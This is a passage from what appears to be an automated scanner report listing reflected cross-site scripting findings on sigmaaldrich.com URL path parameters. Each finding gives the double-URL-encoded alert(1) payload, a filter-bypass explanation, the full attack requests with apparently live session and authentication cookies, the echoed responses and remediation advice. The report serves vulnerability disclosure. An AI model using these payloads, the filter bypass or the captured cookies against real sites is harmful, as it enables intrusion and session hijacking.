Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support77f4b";alert(1)//01ff7cdb67d/customer-service/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.188. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c39a6%2522%253balert%25281%2529%252f%252fe5b0302a57f was submitted in the REST URL parameter 4. This input was echoed as c39a6";alert(1)//e5b0302a57f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-servicec39a6%2522%253balert%25281%2529%252f%252fe5b0302a57f/services/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-servicec39a6";alert(1)//e5b0302a57f/services/mfg-production","E404") ;
   </script>
...[SNIP]...

1.189. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bcca%2522%253balert%25281%2529%252f%252facece9d493 was submitted in the REST URL parameter 5. This input was echoed as 3bcca";alert(1)//acece9d493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services3bcca%2522%253balert%25281%2529%252f%252facece9d493/mfg-production HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28982
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services3bcca";alert(1)//acece9d493/mfg-production","E404") ;
   </script>
...[SNIP]...

1.190. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c96d4%2522%253balert%25281%2529%252f%252f0cc55d18c07 was submitted in the REST URL parameter 6. This input was echoed as c96d4";alert(1)//0cc55d18c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/mfg-productionc96d4%2522%253balert%25281%2529%252f%252f0cc55d18c07 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28983
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/mfg-productionc96d4";alert(1)//0cc55d18c07","E404") ;
   </script>
...[SNIP]...

1.191. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb1c4%2522%253balert%25281%2529%252f%252f9d6f2c4ebeb was submitted in the REST URL parameter 1. This input was echoed as eb1c4";alert(1)//9d6f2c4ebeb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenteb1c4%2522%253balert%25281%2529%252f%252f9d6f2c4ebeb/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenteb1c4";alert(1)//9d6f2c4ebeb/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services","E404") ;
   </script>
...[SNIP]...

1.192. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/mfg-production/oem-services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 233fa%2522%253balert%25281%2529%252f%252fbd0058c4543 was submitted in the REST URL parameter 2. This input was echoed as 233fa";alert(1)//bd0058c4543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich233fa%2522%253balert%25281%2529%252f%252fbd0058c4543/customer-support/customer-service/services/mfg-production/oem-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
